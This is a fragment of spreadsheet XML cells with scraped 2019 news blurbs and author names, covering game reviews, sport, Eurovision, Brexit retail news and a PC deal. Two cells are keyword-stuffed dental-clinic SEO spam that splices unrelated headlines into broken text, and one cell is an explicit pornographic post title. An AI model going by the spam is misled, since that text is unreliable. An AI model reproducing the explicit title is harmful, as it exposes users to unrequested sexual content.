immersion-breaking re-use of assets, and an overall lack of polish”, these technical issues fail to seriously diminish “a crowd-pleaser for those of us who still shake our canes and talk about how the genre peaked a decade ago.” The world of GreedFall is beautiful – but deadly! (Image: Spiders, Focus Home Interactive) ‘Taking notes from roleplaying greats, GreedFall makes up for its faults with a lot of spirit.’ – Eurogamer “GreedFall is very much a typical open-world RPG. If you have ever played one, you’ll be familiar with all of this” writes Malindy Hetfelf of Eurogamer, “Yet GreedFall, for its faults, improves upon most of the big-name games it wants to be compared to in a couple of choice ways.” In particular, she compliments the fact that “no quest is quite like another – and that’s an astounding feat.” As well as noting the aforementioned technical issues, Hetfeld also criticises the shallower aspects of the game’s writing: “My main criticism against GreedFall is character writing. Rather than having a personality, characters fulfil a function. Your party members are a representation of their factions, rather than actual people.” On the whole, though, she found that “the elements that matter have been imbued with such love and care – so much so that I quickly forgave this ambitious RPG its shortcomings.” ‘Is Greedfall janky? Yes. Does it detract from the overall enjoyment of the game? Not yet!’ – Destructoid Spiders have created another stunning, storied world. (Image: Spiders, Focus Home Interactive) “Greedfall has made a pretty great impression on me so far.” enthuses Patrick Hancock in his in-progress review. While he notes minor quibbles like the fact that “It’s not always obvious who you’re fighting, in other words. It’s also not obvious as to why you’re fighting at times” and that “The skill points are so completely boring (more damage! better chance at succeeding a charisma check!)”, he has so far found that “I am constantly enticed to play more.” He notes the same sort of technical bug as other reviewers have mentioned – complaining of the “horrendous facial animations” – but similarly maintains that “Does it detract from the overall enjoyment of the game? Not yet!” ‘Greedfall, even with its flaws, is a game that’s very easy to sink time into without regret.’ – GameWatcher Much of the attention given to GreedFall prior to its release focused on how it would handle its subject matter, and GameWatcher’s Gavin Herman attests that “it’s impossible to talk about Greedfall without mentioning its treatment of colonialism.” He praises it for the way in which “It makes it clear that the methods of colonialism bring heavy damage to the land and its people” but remains concerned that it is clearly “made from a European perspective” with a ritualistic native people who ring a little too true to Native American stereotypes. “It might tell an engaging story, but those concerns stay with you as the game goes on.” Ultimately though, he concludes that “It would be difficult, even impossible, to make an unproblematic game about colonialism. But the one Spiders made is engaging and a lot more open about the sordid nature of it than expected.” GreedFall is available on Xbox One, PC and PS4 now. The post GreedFall review round-up: how the critics have reacted to the RPG as its release date arrives appeared first on inews.co.uk. The post GreedFall review round-up: how the critics have reacted to the RPG as its release date arrives appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Charlie Duffield</t>
  </si>
  <si>
    <t>Ingredients in the cosmetics can cause serious harm, and some products have been mislabelled The post Public warned to avoid rogue skin-lightening creams ‘at all costs’ which ‘act like paint stripper’ appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Four-time Olympian Tanya Harding was once distanced from her "hard" father who drove her to excel with little emotion. Now she is a parent too, she gets it.</t>
  </si>
  <si>
    <t>September 14, 2019. Extinction Rebellion protests blocking the Princess Bridge in Melbourne see the Victoria Police block access to the bridge for protesters to join the protest, and the removal of the media from the area for "safety concerns" in what was a peaceful, predictable protest. (AAP VIDEO/Alex Murray)</t>
  </si>
  <si>
    <t>While many dairy farmers in northern Victoria are downsizing and selling up due to drought and the cost of water, in South Gippsland they are investing in their businesses.</t>
  </si>
  <si>
    <t>Donna Lawler and Steven Freeland bonded over the legal aspects of outer space long before the field became “sexy”.</t>
  </si>
  <si>
    <t>Newcastle United defender Emil Krafth has praised his teammates for creating a positive atmosphere in the dressing room. The former Amiens defender opened up on his move to St James’ Park this summer, claiming everyone was made to feel welcome after Steve Bruce took charge of the Magpies. Speaking in an interview with the Shields Gazette, the Swedish international revealed that all his... Source</t>
  </si>
  <si>
    <t>David Wright</t>
  </si>
  <si>
    <t>Joe Cole believes that Roberto Firmino left Paul Dummett not knowing what to do with himself when the Liverpool forward played in Mohamed Salah with a beautiful piece of skill. Newcastle United let slip of a lead to lose 3-1 against the European champions at Anfield on Saturday with Firmino coming off the bench and pulling the strings in the home side’s attack. Firmino pulled off a great... Source</t>
  </si>
  <si>
    <t>Jon Ola Sand, the Eurovision Song Contest’s Executive Supervisor since 2011, has announced that the 2020 Contest will be his last in the role. Following the 65th Eurovision Song Contest in Rotterdam, he will return to his native Norway to begin a new role at the head office of public broadcaster NRK. Sand will also leave the Head of Live Events post which oversees the Junior Eurovision Song Contest, Eurovision Young Musicians and Eurovision Choir competitions. “The past decade at the European Broadcasting Union (EBU) has been fantastic and exciting, but it will also be good to come home,” he said. “I have been involved with the Eurovision Song Contest for over 20 years. First as Head of Delegation for Norway, then as Executive Producer in Oslo in 2010 and I have been privileged to have been the captain of the ship in Geneva for the past 9 years. “Rotterdam will be my 10th Contest as Executive Supervisor and it seems a good time to pass on the baton and take on a new challenge at NRK. In my new role I will work to ensure that NRK continues to be a world-class public broadcaster and will be in the best possible shape for the future.” Jean Philip De Tender, Director of Media at the EBU said Jon Ola Sand had overseen the growth and development of the contest. “Jon Ola will now oversee his 10th Eurovision Song Contest for the EBU in Rotterdam before taking up his new role at NRK.” As work continues on the 65th Contest, the EBU will now conduct a selective search for a successor.</t>
  </si>
  <si>
    <t>Amy Hall</t>
  </si>
  <si>
    <t>The children at Glebelands Primary School got a taste of life on stage at this year’s Dundee Flower and Food Festival.</t>
  </si>
  <si>
    <t>Every week 11 terminally-ill people in Scotland suffer in pain as they die, campaigners say. The post Hundreds face ‘unbearable pain’ at end of life appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Stephen Letts</t>
  </si>
  <si>
    <t>Despite the Australian economy grinding down to its slowest growth since the financial crisis, there is a strong chance it could still deliver the Federal Government a budget surplus a year earlier than expected.</t>
  </si>
  <si>
    <t>EASTENDERS fans have yet to see Sharon Mitchell and Keanu Taylor’s affair exposed despite him being the father of her unborn child. However, as Ben Mitchell tries to track down the young mechanic, Karen Taylor could accidentally spill all. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Irv</t>
  </si>
  <si>
    <t>Description: Each side of the vessel is finely enamelled with a large taotie mask surrounded by geometric patterns, all set between bands of kuifeng. Greek key fret bracket handles all against a turquoise ground. Age: 19thc Size: Approx 15 cm tall. Interested? Contact us Source</t>
  </si>
  <si>
    <t>There are renewed calls for pedestrians to be aware of their surroundings after a tram undergoing testing hit a teenager near Moore Park.</t>
  </si>
  <si>
    <t>tdw</t>
  </si>
  <si>
    <t>Yes, yes, it's another free coffee deal. Tomorrow Muzz Buzz are giving away FREE TALL COFFEE ALL DAY!! We want you to celebrate Muzz Buzz Day with us. So don't forget to pop into your local Muzz Buzz tomorrow only! Valid 1st October 2019 Only Store locations — WA Only ☕ Mod: All International Coffee Day Deals here ☕</t>
  </si>
  <si>
    <t>The Treasury is warning those in the maritime industry to be wary of involvement with regimes or entities that have been deemed terror sponsors by the U.S. — or face steep costs.</t>
  </si>
  <si>
    <t>Nick Miller</t>
  </si>
  <si>
    <t>A leading QC has accused Boris Johnson of corroding the constitution and destroying democracy - and of calling his predecessor David Cameron a "girly swot".</t>
  </si>
  <si>
    <t>Zimbabwe’s ex-president is laid to rest at his home village three weeks after his death at 95. The post Mugabe funeral: Zimbabwe ex-president laid to rest in Kutama appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Nick O'Malley</t>
  </si>
  <si>
    <t>The President took one message out of the Mueller investigation, this is a chance to send a different one.</t>
  </si>
  <si>
    <t>Officers executed a search warrant at a Forrest Avenue home shortly after 6:30 p.m. Friday and seized a prohibited firearm, police say.</t>
  </si>
  <si>
    <t>A key “witness” in the Malaysia Airlines flight MH17 disaster that claimed the lives of 38 Australians has been returned to Russia under an historic prisoner swap deal with the Ukraine.</t>
  </si>
  <si>
    <t>The contract standoff between Collingwood and Brodie Grundy is only getting messier.</t>
  </si>
  <si>
    <t>Grand Bahama International Airport, known as Freeport Airport, was several feet underwater and rendered unreachable by Hurricane Dorian on Monday, September 2, with staff and all passengers evacuated from the scene as floodwaters surged. Dorian made landfall in the Bahamas on Sunday, September 1, causing major flooding and catastrophic damage. This footage, released by Iram Lewis, MP with the Ministry of Public Works in the Bahamas, shows the extent of the flooding at the airport terminal. Lewis said the airport was evacuated but his team remained on the ground for a time, and filmed this footage. However, they were later evacuated too, as conditions became unmanageable. In a Facebook Live statement later on September 2, Lewis gave an update, saying those living on lower ground in the area were left stranded, with emergency services unable to get to them. He said “they’re getting a lot of distress calls from persons needing rescue.” Credit: Iram Lewis, Ministry of Public Works via Storyful</t>
  </si>
  <si>
    <t>Hello all, we are looking for a cheerful yet committed Nanny/Housekeeper for NW Calgary. Duties include childcare, housekeeping and cooking. Hours are Monday to Friday: 7 am to 4 pm + Overtime Opportunities. Salary: competitive. Required: Valid Drivers license Vulnerability checks and clearance Prior experience with infants Two Kids of age: 7year old daughter who .. Read more</t>
  </si>
  <si>
    <t>Retail chain says it would be unable to offset effects of no deal as it posts first-ever half-year lossJohn Lewis has warned that a no-deal Brexit would have a significant impact on its business as it slumped to its first-ever half-year loss.The group, which owns Waitrose as well as the John Lewis department stores, dived £25.9m into the red in the six months to 27 July after making an underlying pretax profit of £0.8m in the same period a year before. Continue reading… Read More</t>
  </si>
  <si>
    <t>Kawhi Leonard’ decision to leave the reigning NBA champions Toronto Raptors for the Los Angeles Clippers has undeniably changed the NBA landscape. The core of Kyle Lowry, Marc Gasol, Pascal Siakam, Serge Ibaka, and OG Anunoby may be able to extend the Raptors’ playoff streak in the 2019-20 NBA season but without Leonard on their roster, it remains a big question if they still have what it takes to bring home another Larry O’Brien Trophy to Toronto. Though they all made contributions to their success last season, no one can deny the fact that Leonard played the biggest role in helping the Raptors win their first NBA championship title. Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>Julian Assange will stay in prison after his jail term comes to an end next week over fears he will evade extradition proceedings again. Read more? Click here</t>
  </si>
  <si>
    <t>Congressman David Cicilline, chair of the U.S. House Judiciary Committee's antitrust panel, said on Friday that Facebook Chief Executive Mark Zuckerberg pledged cooperation with the panel's probe into online markets during a meeting on Capitol Hill.</t>
  </si>
  <si>
    <t>We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral de. Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards! We sincerely care about your teeth, your smile, and you as an individual. Our. Kid Friendly Dentist Near Kitchener How To Find A Low-Carb Doctor Near Me? – One of the most frequently asked questions I receive is “how do I find a doctor near me that understands low-carb. Want. And they can influence what "family friendly" means at their companies. "I still call doctors and follow up with the. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Cataract surgery gave me 20/20 vision for the first time in my adult life, writes Valerie Hill – So was being called "pirate" by all the mean kids in the Waterloo Region Record newsroom. I took three days off work. On my. Reviews on Kid Friendly Restaurants in Kitchener, ON – Fork and Cork Grill, J &amp; B Family Restaurant, Red House, The Adventurers' Guild Cafe, The Crazy Canuck, The Bent Elbow, The Cactus, The Bauer Kitchen, Moose Winooski's, Pupuseria. Our dentist office in Kitchener welcomes all members of the family including elderly people, teenagers, children. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Kid Friendly Dental Clinic In Kitchener Kitchener East. Number 1 Dental Clinic Near Kitchener Ontario Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Road South, Unit #203 Kitchener, Ontario, Canada N2C 2N9 519-893-9494 Emergency Dental Center – Waterloo 258 King Street North, Unit #7 Waterloo, Ontario, Canada, N2J 2Y9 519-883-0505. . Cosmetic Dentist Near Kitchener Ontario Cosmetic Dentists top services with user reviews and recommandations near Kitchener (ON). What Where Register Log in Cosmetic Dentists near Kitchener, ON Fyple Ontario Kitchener Health &amp; Beauty Dentists Cosmetic Dentists Add your business. Best Cosmetic Dentists in Kitchener, ON – Arvanitis &amp; Associates Dentistry by Design, Waterloo Smiles Dentistry, Dawson Dental Centre, Solar Dental, King Street Dental Centre, Laurentian Dental Centre, Grand River Dental Care, Station. Best Dental Clinic Near Kitchener It was wet and cold, she remembered, and near 11 p.m. Buddy. the posters went into grocery and pet stores and vet clinics, Dental Clinics top services with user reviews and recommandations near Kitchener (ON). What Where Register Log in Dental Clinics near Kitchener, ON Fyple Ontario Kitchener Health &amp; Beauty Dentists Dental Clinics Add your business for free +. Cosmetic Dentist Near Kitchener Cosmetic dentistry services from Kitchener East Family Dental in Kitchener, ON can make your smile brighter! Call today to learn more. As a leading dentist near Kitchener, our team is skilled in evaluating smiles and recommending treatments. Cosmetic Dentist in Kitchener, Ontario 5 5 out of 5 stars. Closed Now ABOUT DR. ANDREW TSANDELIS FAMILY &amp; COSMETIC DENTISTRY Creating Beautiful Smiles in Kitchener, Ontario. The dentists at Dr. Jim Ellis DDS Dentist – Ogden offer each patient the personalized care and attention needed to ensure. Most Popular Dental Clinic In Kitchener Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Elite Dental continues to great beautiful smiles across Turkey one person at a time – The dental clinic has become increasingly popular in recent times. The mouth is one of the most important parts of the. Most Popular Dental Clinic Near Kitchener Best Dental Clinic In Kitchener Ontario Find the best Dentist in Kitchener, ON. Discover Dentists real customer reviews and contact details, including hours of operation, Danube Dental Clinic Dentist in Kitchener 77 Water Street North, Kitchener, ON N2H 5A6 Dentist in Kitchener 23. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non-Surgical Extractions, Wisdom Tooth Extraction. . We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral de. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Kid Friendly Dental Clinic In Kitchener Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. SUNBURY — Renovations for the second floor of the Susquehanna River Valley Dental Health Clinic are expected to be finished . Golsen Family Dentistry is a Family Dentist in Alpharetta – Golsen Family Dentistry offers a comprehensive dental care and treatment service that begins and ends with patient satisfaction. From the moment patients walk into the clinic, they are presented. County clinic gets a facelift – Also on the ground floor are family planning, immunizations and maternal-child health, which has its own kid-friendly waiting. Preferred Dental Clinic Near Kitchener Ontario At the dental office of the Dr. Michael Bensky, we offer a vast variety of dental services and procedures. At our dental offices in Kitchener and Cambridge, Ontario, you're important to us. Knowing each individual well helps us develop a. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Kid Friendly Dentist In Kitchener Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Smile Town, Danube Dental Clinic, Trillium Dental Centre, Midgley Dental, Laurelwood Family Dentistry, Toothworks Fairview Park Dental, Kitchener East Family Dental, Harmony. . Golsen Family Dentistry is a Family Dentist in Alpharetta – Alpharetta, GA – At Golsen Family Dentistry, delivering the gold standard. As part of the services offered, the friendly administrative staff will also handle all paperwork, familiarizing. It will get a bit corny in Cambridge – Along with the consistent elements of the Community CornFest, some highlights for this year include live music by Menno. Cosmetic Dentist In Kitchener Visit your cosmetic dentist Kitchener Waterloo for a healthy, beautiful smile! We provide the latest cosmetic treatments that make a noticeable difference in your smile. A Healthy, Beautiful Smile is Within Your Reach! At Harmony Dental Care. Best Cosmetic Dentists in Kitchener, ON – Arvanitis &amp; Associates Dentistry by Design, Waterloo Smiles Dentistry, Dawson Dental Centre, Solar Dental, King Street Dental Centre, Laurentian Dental Centre, Grand River Dental Care, Station. Cosmetic Dentist in Kitchener, Ontario 5 5 out of 5 stars. Closed Now ABOUT DR. ANDREW TSANDELIS FAMILY &amp; COSMETIC DENTISTRY Creating Beautiful Smiles in Kitchener, Ontario Our dental office is a progressive and family-oriented dental care. Handpicked Top 3 Cosmetic Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust. Sedation Dentistry, Root Canals, Dentures, Extractions, Wisdom Teeth, Partial Dentures, Emergency Dentist &amp;. Most Popular Dental Clinic Near Kitchener Goodbye, perhaps, to legal aid clinics. where most students leave after classes, will be affected differently than those. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. 50 Secrets to Live to 100 – The Remedy Rx: Truck driver, farmers and construction laborers are among the most dangerous, mainly owing to vehicular. Find the Top Dental Hygienists in Kitchener, ON Enter your location so we can match you with dental hygienists near you Go. Nancy Hall is delighted to welcome you and your family to her clinic. Nancy Hall &amp; Associates Dental Hygiene Care. Top Dentist In Kitchener Ontario Best Dental Clinic Near Kitchener Ontario The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Best Dentist Near Kitchener Ontario Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Kitchener. We’re the original doctor ratings site with over 2 million reviews. Reviews on Dentist Reviews in Kitchener, ON – Solar Dental, King Street Dental Centre, Waterloo Smiles Dentistry, Fairway Dental Urgent Care Clinic, Lackner Woods Family Dentistry, de Man &amp; Höediono Dentistry, Arvanitis &amp; Associates Dent. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. Best of 2019 – Dentists in Kitchener, ON Best of 2019 – Dentists in Kitchener, ON. Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently accepting new patients. Schedule your appointment today! Dentistry on Lawrence 232 Lawrence Avenue, Kitchener, ON N2M 1Y4 (1) Make Appointment. Waterloo ‘Swiftie’ forges connection with ‘best friend’ Taylor – Timeline: 2019: A young Pakistan immigrant lives in inclusive, multicultural Ontario, plagued by hardship. "It felt like I. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Kitchener. We're the original doctor ratings site with over 2 million reviews. Name Toggle navigation Menu Find A Doctor Find A Facility Health News Health Forum Best. Jacob Boudreau lives near the trail on James Street East and. to the river,” Cutten Fields said in a statement to CTV Kitchener. “After numerous calls to Guelph Police and bylaw enforcement. Top Dental Clinic Near Kitchener Lancaster Dental General Dentistry 493 Street W -&gt; Source https://www.yelp.ca/biz/lancaster-dental-kitchener Fairway dental urgent care clinic kitchener dentists fairway dental emergency clinic kitchener ontario facebook fairway dental urgent. Dental Clinics top services with user reviews and recommandations near Kitchener (ON). What Where Register Log in Dental Clinics near Kitchener, ON Fyple Ontario Kitchener Health &amp; Beauty Dentists Dental Clinics. . NEW YORK, Aug. 27, 2019 /PRNewswire/ — A new survey of 1,500 Americans between the ages of 18 and 65+ examines how people choose a dentist or dental clinic. a new dentist near you on Google. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CL. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Preferred Dental Clinic Near Kitchener Ontario Most Popular Dental Clinic In Kitchener Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care for their smiles. The dentists and their team are highly trained and have wide experience in enhancing the denta. 25-year-old Altro safety floor still going strong at Melbourne vet clinic –. well equipped to treat most medical and surgical conditions to a very high standard, and provide the best possible pet care. The clinic also offers services in preventative medicine, diagnostics, Elite Dental continues to great beautiful smiles across Turkey one person at a time – The dental clinic has become increasingly popular in recent times. The mouth is one of the most important parts of the. Rapha Dental Number 1 Dental Clinic Near Kitchener Ontario Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Road South, Unit #203 Kitchener, Ontario, Canada N2C 2N9 519-893-9494 Emergency Dental Center – Waterloo 258 King Street North, Unit #7 Waterloo, Ontario, Canada, N2J 2Y9 519-883-0505. . Cosmetic Dentist Near Kitchener Ontario Cosmetic Dentists top services with user reviews and recommandations near Kitchener (ON). What Where Register Log in Cosmetic Dentists near Kitchener, ON Fyple Ontario Kitchener Health &amp; Beauty Dentists Cosmetic Dentists Add your business. Best Cosmetic Dentists in Kitchener, ON – Arvanitis &amp; Associates Dentistry by Design, Waterloo Smiles Dentistry, Dawson Dental Centre, Solar Dental, King Street Dental Centre, Laurentian Dental Centre, Grand River Dental Care, Station. Best Dental Clinic Near Kitchener It was wet and cold, she remembered, and near 11 p.m. Buddy. the posters went into grocery and pet stores and vet clinics, Dental Clinics top services with user reviews and recommandations near Kitchener (ON). What Where Register Log in Dental Clinics near Kitchener, ON Fyple Ontario Kitchener Health &amp; Beauty Dentists Dental Clinics Add your business for free +. Cosmetic Dentist Near Kitchener Cosmetic dentistry services from Kitchener East Family Dental in Kitchener, ON can make your smile brighter! Call today to learn more. As a leading dentist near Kitchener, our team is skilled in evaluating smiles and recommending treatments. Cosmetic Dentist in Kitchener, Ontario 5 5 out of 5 stars. Closed Now ABOUT DR. ANDREW TSANDELIS FAMILY &amp; COSMETIC DENTISTRY Creating Beautiful Smiles in Kitchener, Ontario. The dentists at Dr. Jim Ellis DDS Dentist – Ogden offer each patient the personalized care and attention needed to ensure. Most Popular Dental Clinic In Kitchener Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Elite Dental continues to great beautiful smiles across Turkey one person at a time – The dental clinic has become increasingly popular in recent times. The mouth is one of the most important parts of the. Most Popular Dental Clinic Near Kitchener Best Dental Clinic In Kitchener Ontario Find the best Dentist in Kitchener, ON. Discover Dentists real customer reviews and contact details, including hours of operation, Danube Dental Clinic Dentist in Kitchener 77 Water Street North, Kitchener, ON N2H 5A6 Dentist i...</t>
  </si>
  <si>
    <t>Hi all, Think these will go alright as mid tier and entry level CPU/GPU combos. They are offered at this very low price point as a base spec with room to upgrade most components. Spec: Ryzen 5 3600 | GTX 1660 Ti 6GB (MSI Ventus guaranteed for first 35 orders) | 8GB 2400MHz | 240GB 2.5" SSD | Biostar A320M MB | 550W PSU | Leaper Small Case Price: $799 after R53600-1660Ti Link: https://techfast.com.au/products/amd-ryzen-5-3600-gtx-1660-t... and Spec: Intel Core i5 9400F | RX 570 4GB | 8GB 2400MHz | 120GB 2.5" SSD | Biostar H310M MB | 550W PSU | Leaper Small Case Price: $599 after i59400F-RX570 Link: https://techfast.com.au/products/core-i5-9400f-rx-570-4gb-ga... Community-recommended upgrades for these from previous deals are the B350/B360 motherboard ($39) and 240GB NVMe SSD drive ($59 from 120GB/$39 from 240GB, requires B350/B360 motherboard for m.2 functionality), and/or 16GB RAM, either at 2400MHz ($99) or 3200MHz ($179). Both RAM upgrades are a little dearer at the moment due to supply shortage and price fluctuations. I've contacted numerous customers regarding existing orders, and those that are due should be shipping by week's end, applying to low-end and high-end systems (570/580/1660/5700/2080 systems) but feel free to reach out for specifics if you need to. Luke</t>
  </si>
  <si>
    <t>Report: City U18s 5-2 Liverpool Original Source Manchester City continued our 100% winning start to the Under-18 Premier League season as Gareth Taylor’s side came from behind twice to beat Liverpool 5-2 at the City Football Academy. 1 Manchester City U18 5 +18 15 2 Liverpool U18 5 +5 10 3 Wolverhampton Wanderers U18 5 +5 10 4 Everton U18 4 +12 9 What happened This top of the table clash in the Under-18 Premier League started brightly, with Liverpool enjoying the better of the early exchanges. City goalkeeper James Trafford endured a few nervous moments early on as his attempts to play out from the back were intercepted well by the visitors on two occasions, but they failed to punish him. READ: Guardiola | ‘Sterling can be a world-beater’ WATCH: Inside City | Episode 353 The early pressure gave Liverpool plenty of confidence and they made their dominance count in the 21st minute as Jake Cain found the top corner from the edge of the box with a curling drive. The young Blues reacted brilliantly and levelled the scores ten minutes later, with James McAtee calmly slotting the ball beyond Jakub Ojrzynski after a wonderful solo run. It was now a much more even affair, but the visitors were in disbelief as they were denied three times in quick succession by some wonderful defending, including a sensational clearance off the line. From the resulting corner, Liverpool regained the lead through Niall Brookwell, who nodded in from inside the six-yard box. enlarge City almost found another equaliser, but Delap’s deflected effort cannoned back off the crossbar in the last action of a pulsating first-half. Gareth Taylor’s side began the second period with great intensity and were unlucky to see Delap’s powerful drive strike the post almost immediately after the restart. The City striker finally got his goal in the 50th minute as he capitalised on some static Liverpool defending as they waited for an offside flag that never came. Just after the hour mark, we took the lead for the first time as Delap got his second goal of the game, dinking the ball over the onrushing Ojrzynski after brilliantly out-muscling and out-pacing Billy Koumetio. It almost got even better for the Blues, but substitute Jamie Bynoe-Gittens struck the base of the post. City finally established a two-goal lead, with D’Margio Wright-Phillips arrowing an effort into the top left corner in the 72nd minute from 20 yards after some neat dribbling. enlarge The Blues continued the relentless pressure and as the visitors pushed forward to get themselves back into the game, Delap led a blistering counter attack, playing Bynoe-Gittens through, who rounded Ojrzynski and slotted in for our fifth goal to cap off a fine afternoon. What it means The victory keeps City at the top of the U18 Premier League table with five victories from five matches. The Young Blues have now scored 22 goals and have only conceded four times. How we lined up James Trafford started in goal, with Sammy Robinson, Finley Burns, CJ Egan-Riley and Oscar Tarensi making up the back four. Alex Robertson, Oscar Bobb and James McAtee played in midfield, whilst skipper D’Margio Wright-Phillips and Samuel Edozie provided the width for front-man Liam Delap. What’s next Our U18 side face a trip to Blackburn next in the U18 Premier League, with the match scheduled for Saturday 21 September at 11am BST. CITYZENS: QUIZ – Test your knowledge on Vincent Kompany’s City career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Report: City U18s 5-2 Liverpool appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>/u/Chikerbaud</t>
  </si>
  <si>
    <t>submitted by /u/Chikerbaud [link] [comments] The post Cougar Hotwife calls a Gigolo to Fuck her Married Cunt and Asshole appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Guests tonight on The Celebrity Chase are Derryn Hinch, Lauren Jackson, Joel Creasey and Anne Edmonds. They take on The Governess, Anne Hegerty. 7:30pm tonight on Seven.</t>
  </si>
  <si>
    <t>The Rabbitohs enforcer has slammed the system that resulted in him missing a finals game over a hair pull.</t>
  </si>
  <si>
    <t>A judge approves Jamie Spears’ request to be relieved of his role as Britney’s conservator. The post Britney Spears’ father steps down as conservator appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Dr. Benedict</t>
  </si>
  <si>
    <t>Best Dentists in Halton Hills, ON – Still Waters Dental Group, Dentistry On Sinclair, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Oksana M. Sawiak, DDS IMD. Find the best Dentist in Halton Hills, Ontario. Discover Dentists reviews and contact details, including opening hours and phone numbers. Add a company Share Share Tweet Dentists in Halton Hills, ON – Ratings &amp; Customer Reviews Canada Dentis. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, Market Place Dental Centre, King's Cove Family Dental, Young Dentistry, Oksana M. Number 1 Dental Clinic In Halton Hills Kid Friendly Dentist In Halton Hills Most Popular Dental Clinic Near Halton Hills Admire Dental is a renowned dental care clinic that offers a range of friendly, caring and affordable dental services to its patients. Visit the website for more. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Kid Friendly Dental Clinic In Halton Hills Ontario Kid Friendly Dentist In Halton Hills Most Popular Dental Clinic Near Halton Hills Admire Dental is a renowned dental care clinic that offers a range of friendly, caring and affordable dental services to its patients. Visit the website for more. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group,</t>
  </si>
  <si>
    <t>Grand Canyon National Park rangers said they received an emergency call to an area of the Colorado River but attempts to revive the man were not successful.</t>
  </si>
  <si>
    <t>A musical welcome had the royal couple dancing as Prince Harry, Meghan and son Archie begin their first official tour as a family.</t>
  </si>
  <si>
    <t>A stunning swoop for an All-Australian forward could rely on how Sydney handles a homesick young gun.</t>
  </si>
  <si>
    <t>Europe RV Trip Day 3 / $2 TTS / $2 MEDIA (2 MIN) @Tracksuit_Cx / r/TracksuitCx The post Europe RV Trip Day 3 / $2 TTS / $2 MEDIA (2 MIN) @Tracksuit_Cx / r/TracksuitCx appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>save50</t>
  </si>
  <si>
